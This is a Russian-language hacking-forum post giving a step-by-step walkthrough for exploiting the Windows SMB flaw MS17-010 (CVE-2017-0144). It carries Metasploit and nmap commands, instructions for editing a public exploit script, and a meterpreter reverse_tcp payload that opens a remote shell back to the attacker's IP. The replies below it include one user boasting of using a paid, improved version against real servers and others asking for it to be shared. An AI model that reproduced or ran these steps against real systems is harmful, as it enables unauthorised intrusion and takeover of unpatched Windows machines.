• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья CVE-2017-0144 |MS17-010

Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:
Код:
https://www.exploit-db.com/exploits/42315/
и это :
Код:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
и вот это:
Код:
https://github.com/trustedsec/unicorn
Кидаем все в одну папку и создаем файл:
Код:
touch _init_.py
Следующим шагом заходим в metasploit.
Пишем :
Код:
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
Должно появиться это:
2018-06-06_15-24-46.png
Теперь пишем:
Код:
nmap -A -p 445 <ваша цель>
Нас интересует это:
2018-06-06_15-28-10.png
Далее пишем:
Код:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:
2018-06-06_15-32-23.png
Убираем комментарий с этой строчки:
2018-06-06_15-33-36.png
Приводим строчку в такой вид:
2018-06-06_15-35-04.png
Теперь создадим нагрузку:
Код:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:
2018-06-06_15-43-02.png
Удалим кавычку в конце:
2018-06-06_15-44-04.png
Сохраняем файл.
Выставляем прослушку в metasploit :
Код:
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload  windows/meterpreter/reverse_tcp
exploit
Эксплуатируем:
Код:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Выполняем команду до тех пор пока не появиться это:
2018-06-06_15-48-48.png
Нам прилетает сессия)
2018-06-06_15-50-08.png
Протестировано на:
Код:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
 
Последнее редактирование:

skill

Green Team
06.02.2018
33
25
BIT
0
Просто прежде чем писть разбери подробно а не поверхностно
 

skill

Green Team
06.02.2018
33
25
BIT
0
Хорошо чем отличается? И из 9 страниц нет того что ты описал? Ладно пусть будет уникальной
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
уязвимость до сих пор актуальна! в бою проверял иногда выручает! и кстати ее постоянно усовершенствуют и продают к счастью я являюсь счастливым обладателем сего софта)
и скажу что дедики сшибает на раз-два
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
7
уязвимость до сих пор актуальна! в бою проверял иногда выручает! и кстати ее постоянно усовершенствуют и продают к счастью я являюсь счастливым обладателем сего софта)
и скажу что дедики сшибает на раз-два

Поделитесь с собратьями по оружию ? :)
 
  • Нравится
Реакции: Ondrik8
T

The ROOT

По данному методу возникла ошибка, что я не так сделал?
1529651703081.png

Как понимаю не может импортировать файл MYSMB. Откуда его взять и куда положить нужно?
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
T

The ROOT

ReQ

Green Team
04.01.2018
19
2
BIT
7
Тоесть это работает только в локальной сети?
 

Positive Nickname

New member
24.07.2018
1
0
BIT
0
Очень интересно, спасибо.
Возник вопрос к пункту где nmap'ом тащишь юзера. Предположим на целевой машине при скане 445 порта выдало вместо "guest" и тд "<blank>". Меняет ли как то это алгоритм эксплуатации, или в данном случае статья не актуальна?
Целевой хост Windows 2016
 

IKUS

Green Team
06.10.2017
20
2
BIT
0
.... ищу софтину для сканера 445 порта с указанием диапазона адреса
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!